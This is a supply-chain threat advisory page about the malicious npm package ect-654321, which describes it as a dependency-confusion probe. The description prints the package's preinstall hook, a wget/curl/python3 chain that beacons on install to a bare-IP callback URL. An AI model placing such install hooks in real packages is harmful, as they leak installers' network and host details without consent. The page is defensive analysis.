THREATPKG
SYNC STALE

Supply-chain threat intelligence

Incident detail

criticalnpm·malware·osv

Malicious code in ect-654321 (npm)

ect-654321

Risk score

92

AI summary

Indexed incident for ect-654321 (npm).

Description

ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget http://10.107.121.85:8000/callback_wget_654321 || curl http://10.107.121.85:8000/callback_curl_654321 || python3 -c...urlopen('http://10.107.121.85:8000/callback_py_654321') on npm install. The destination is a bare RFC1918 IP on plain HTTP with no documented purpose, and the callback path embeds the package version as a probe identifier. The package ships no library code, no main entry, and an empty author field with description 'Probe', so the only effect of installing it is the outbound beacon. This shape — empty placeholder package + version-numbered callback path + bare-IP HTTP fetch in preinstall — is a dependency-confusion / namespace-probing payload that confirms reachability of the installer's network to the operator and leaks the installer's source IP, DNS resolver, and host identity. The triple-fallback (wget/curl/python3) ensures the beacon fires across diverse install environments. Whether published as red-team research or real attack tooling, the install-time behavior is identical and harmful to any installer that pulls the package.

Technical details

Affected versions

=100.0.0=100.0.3=100.0.7=100.0.8=100.0.4=100.0.1=100.0.2

Indicators

  • affected version=100.0.075%
  • affected version=100.0.375%
  • affected version=100.0.775%
  • affected version=100.0.875%
  • affected version=100.0.475%
  • affected version=100.0.175%
  • affected version=100.0.275%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents